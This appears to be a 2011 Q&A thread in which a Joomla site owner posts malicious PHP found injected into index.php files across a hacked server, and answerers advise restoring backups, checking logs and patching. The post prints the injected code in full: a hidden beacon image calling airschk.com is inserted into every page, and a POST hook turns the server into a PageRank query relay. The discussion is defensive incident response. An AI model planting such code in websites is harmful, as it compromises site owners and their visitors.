Finding out who hacked my site

Question

Possible Duplicate:
My server's been hacked EMERGENCY

All Joomla! sites hosted on a single server of mine were hacked and had the following code injected into the index.php files throughout many directories.

    <?php
//{{126104ed

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)
{
  $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}

function StrToNum($Str, $Check, $Magic)
{
   $Int32Unit = 4294967296;
   $length = strlen($Str);
   for ($i = 0; $i < $length; $i++) {
       $Check *= $Magic;
       if ($Check >= $Int32Unit) {
           $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
           $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
       }
       $Check += ord($Str{$i});
   }
   return $Check;
}
function HashURL($String)
{
   $Check1 = StrToNum($String, 0x1505, 0x21);
   $Check2 = StrToNum($String, 0, 0x1003F);

   $Check1 >>= 2;
   $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
   $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
   $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

   $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
   $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

   return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
   $CheckByte = 0;
   $Flag = 0;

   $HashStr = sprintf('%u', $Hashnum) ;
   $length = strlen($HashStr);

   for ($i = $length-1; $i >= 0;  $i--) {
       $Re = $HashStr{$i};
       if (1 === ($Flag % 2)) {
           $Re += $Re;
           $Re = (int)($Re / 10) + ($Re % 10);
       }
       $CheckByte += $Re;
       $Flag ++;
   }

   $CheckByte %= 10;
   if (0 !== $CheckByte) {
       $CheckByte = 10 - $CheckByte;
       if (1 === ($Flag % 2) ) {
           if (1 === ($CheckByte % 2)) {
               $CheckByte += 9;
           }
           $CheckByte >>= 1;
       }
   }

   return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
   $ch = CheckHash(HashURL($url));
   $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   $data = file_get_contents($file);
   $pos = strpos($data, "Rank_");
   if($pos === false){return -1;} else{
       $pr=substr($data, $pos + 9);
       $pr=trim($pr);
       $pr=str_replace("
",'',$pr);
       return $pr;
   }
}

if(isset($_POST['xxxprch']))
{
    echo getpr($_POST['xxxprch']);
    exit();
}
else
  ob_start('outputxxx_callback');

error_reporting($olderrxxx);
}

//}}861921ab

As far I was aware and according to all documentation, my Joomla! sites were secure. However, all of them on the same server were hacked at the same time. Is the hosts fault?

Anyone know where I should begin cleaning this mess up? Any quick solutions apart from my site backups?

And the biggest question I have is what would be the best way to trace the hacker to his/her site, server or location? I really want to show them my appreciation of their work in return.

As to your 'Biggest Question,' you probably can't track the source of the breach, as foreign systems are likely involved, and they won't waste time on small beans. Try not to take the breach personally, though. All that aside, your logs are the place to start, assuming they are unaltered. Also your service provider for the server might have some limited traffic data logged (like IP addresses and date stamps). — JeffG, Apr 21 '11 at 21:04
Once your system is 'owned,' your backups are your only trustable recourse, but be ware - whatever vulnerability led to this breach, also exists in your backups. For extra credit, you could setup a honeypot using the backups and capture some data to see how the breach happened (if they attackers re-attack your system after a restore). — JeffG, Apr 21 '11 at 21:06
@Andy Smith, investigations are better left to professionals... i.e. the FBI. The fact that you need to ask how to start the investigation means you'd likely be in way over your head... and for what good reason? Let the FBI do the work, if they haven't been notified already — Mike Pennington, Apr 22 '11 at 02:50
Note for future readers: http://stackoverflow.com/questions/7402301/hackers-have-added-content-to-my-php-files/7402388#7402388 — Incognito, Sep 13 '11 at 14:09

score 4 · Answer 1 · answered Apr 21 '11 at 21:11

"As far I was aware and according to all documentation, my Joomla! sites were secure."

That statement is your first problem. If you google for "joomla hacked" there are 280,000 results just in the past month alone...

As far as recovery, I wouldn't trust anything shy of restoring from a known good backup. Those edits are just the ones you found. Who knows what else might have been put in there.

For tracking them down, you might want to start by reading this: http://kb.siteground.com/article/Joomla_hacked.html

In a nutshell I'd say your chances are close to nil. However, they go up a few percentage points if you happen to have deep pockets or government backing.

score 2 · Accepted Answer · answered Apr 21 '11 at 21:17

My guess is that they got the password for your server with a Trojan. Check your computer asap, specially if you store the server passwords in any program (browser, ftp clients, total commander, etc.) Btw: I'm assuming you're using windows

About tracing the hacker, its not going to be easy. First check the access-logs from the time this happened. You'll probably see tons of ftp activity there. Have a look at the IP of those logs. If all of them are different, then he's probably using zombie computers and its very unlikely that you'll get to him. If they're all the same, then you might be a little more lucky.

Anyway, this sounds like an automated attack. Do a search to check if other sites (not in your server) had the same code injected to them.

I'd like to know who downvoted this answer, and why, considering it was accepted as the right answer. — Cristian, Apr 28 '11 at 20:19

score 1 · Answer 3 · answered Apr 21 '11 at 21:13

You don't give us enough details to be able to help with the how, it was almost certainly an automated attack and trying to track it down will just waste your time.

There is no quick way to recover from this. Nuke from orbit and restore from a known good backup is the only way to go.

score 0 · Answer 4 · answered Apr 21 '11 at 21:50

0

Make sure you keep Joomla up to date! Keep on top of security updates and get them installed on all sites they day they are released.

answered Apr 21 '11 at 21:50

Alex

430
1
9
14

score 0 · Answer 5 · answered Apr 22 '11 at 20:26

0

There is some explanation about it here:

http://sucuri.net/malware/malware-entry-mwbackdoor23

Which seems to be a backdoor and the img src is just used to notify the attackers that the backdoor is there...

answered Apr 22 '11 at 20:26

David Dede

1

Finding out who hacked my site

5 Answers5